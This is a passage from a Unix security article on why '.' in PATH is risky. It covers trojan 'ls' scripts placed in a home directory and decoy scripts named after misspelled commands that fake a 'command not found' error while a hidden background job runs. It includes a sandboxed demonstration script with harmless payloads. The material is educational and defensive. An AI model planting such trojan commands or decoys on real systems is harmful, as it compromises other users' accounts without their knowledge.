. anywhere in your PATH variable is a
bad idea. It is possible to have your account broken into if you are
not careful. I will give here an outline of some of the ways in which
your account could get compromised.
These explanations are meant to be informational in nature and to
help you avoid problems.
You should never use your knowledge to cause harm. Remember that
breaking into an account always causes harm, even if you do nothing
once you are in. People feel insecure and lose confidence in you in
particular, and in computer folks in general.
If a user has placed a . at the beginning of the path, it is
possible for you to make him/her execute any command you like by
constructing a script or program with the same name as a common
command, e.g. ls.
The most common place to put it is the top level of your own home
directory. People, especially novices, usually execute the following
sequence:

bash$ cd ~fluffy
bash$ ls

This will then execute your ls instead of the system-supplied ls,
because . is searched before the system directories.
This could be avoided by placing the . last in your path, so that the
system directories are searched first, but since humans are human,
they make errors. A trivial error is to misspell a command, and a
misspelled command is found nowhere else in the path, so the search
still ends up in . . Hence you could create a set of scripts (or one
script and a bunch of hard links to it) named after common
misspellings of common commands. The script could then print the same
error message as the one the shell prints for an unknown command, and
the user would be none the wiser, but would have a broken account.
It might seem that the time the script needs to do its work, compared
with how quickly the shell normally reports an unknown command, would
give it away, but this is not a problem. The script can spawn a
background process that does whatever it likes for as long as it
likes, while the script itself just prints the message and exits
immediately.
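The following script is an added demonstration of the two tricks above and of the check a careful user would run on PATH; it is not code from the original article. It builds a throwaway directory holding a harmless trojan ls (which logs that it ran and then hands over to the genuine ls) and a decoy named lss (an assumed misspelling of ls) that mimics bash's "command not found" message while a detached background job keeps running. The directory layout, the name lss and the assumption that the victim's shell is bash (for the wording of the mimicked message) are all choices made for this example.

```shell
#!/bin/sh
# Added demonstration, not code from the original article. It builds a
# throwaway directory containing a harmless trojan "ls" and a "command not
# found" decoy named "lss" (assumed misspelling of ls), then plays the
# victim with "." first and with "." last in PATH. Nothing is written
# outside the temporary directory, which is removed on exit.

# 1-based position of the first PATH entry that means "current directory":
# a literal "." or an empty entry (leading, trailing or doubled ":").
# Prints 0 if PATH never searches the current directory.
dot_position() {
    _rest="$1:"    # trailing ":" keeps a final empty element visible
    _i=0
    while [ -n "$_rest" ]; do
        _i=$((_i + 1))
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        case "$_entry" in
            ""|.) echo "$_i"; return 0 ;;
        esac
    done
    echo 0
}

SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
VICTIM_DIR="$SANDBOX/home"          # the booby-trapped directory
LOG="$SANDBOX/trojan.log"           # written only by the trojan ls
SAFE_PATH=$(getconf PATH 2>/dev/null || echo /usr/bin:/bin)
REAL_LS=$(PATH="$SAFE_PATH"; command -v ls)   # resolved before tampering
mkdir -p "$VICTIM_DIR"

# Trojan ls: log who ran it and where, then exec the genuine ls so the
# victim sees exactly the listing they expected.
cat > "$VICTIM_DIR/ls" <<EOF
#!/bin/sh
printf '%s ran trojan ls in %s\n' "\$(id -un)" "\$PWD" >> "$LOG"
exec "$REAL_LS" "\$@"
EOF

# Decoy for the misspelling: start the real work as a detached background
# job (here it merely drops a marker file after a delay), then print the
# message bash would print for an unknown command and exit 127 like bash.
cat > "$VICTIM_DIR/lss" <<EOF
#!/bin/sh
( sleep 1; echo done > "$SANDBOX/payload.done" ) >/dev/null 2>&1 &
echo "bash: \$(basename "\$0"): command not found" >&2
exit 127
EOF
chmod +x "$VICTIM_DIR/ls" "$VICTIM_DIR/lss"

# Play the victim with the given PATH: cd into the trapped directory, run
# "ls", then mistype it as "lss". Prints what the victim sees from "lss".
run_scenario() {
    : > "$LOG"
    rm -f "$SANDBOX/payload.done"
    (
        cd "$VICTIM_DIR" || exit 1
        PATH="$1"
        ls > /dev/null          # genuine or trojan, depending on PATH order
        lss 2>&1 || true        # exit status 127 is expected either way
    )
}

# Did the last scenario run the trojan rather than the genuine ls?
trojan_ran() { [ -s "$LOG" ]; }

# Did the decoy's background job finish after the decoy itself had exited?
payload_finished() {
    _tries=0
    while [ "$_tries" -lt 5 ]; do
        [ -f "$SANDBOX/payload.done" ] && return 0
        sleep 1
        _tries=$((_tries + 1))
    done
    return 1
}

# Stand-alone run: "." first catches ls itself; "." last still catches the
# misspelling, because lss exists nowhere else in the path.
for p in ".:$SAFE_PATH" "$SAFE_PATH:."; do
    echo "PATH=$p  (current directory searched at position $(dot_position "$p"))"
    echo "  lss  -> $(run_scenario "$p")"
    if trojan_ran; then echo "  ls   -> trojan"; else echo "  ls   -> genuine"; fi
    if payload_finished; then echo "  decoy's background job finished"; fi
done
```

Two details worth noticing: the decoy redirects its background job's file descriptors to /dev/null before detaching it, otherwise the job would keep the victim's terminal (or any pipe capturing the output) open and betray itself; and dot_position treats an empty PATH element as the current directory, which is how shells interpret a leading, trailing or doubled colon, so a PATH that merely ends in ":" is just as exposed as one that ends in ":.".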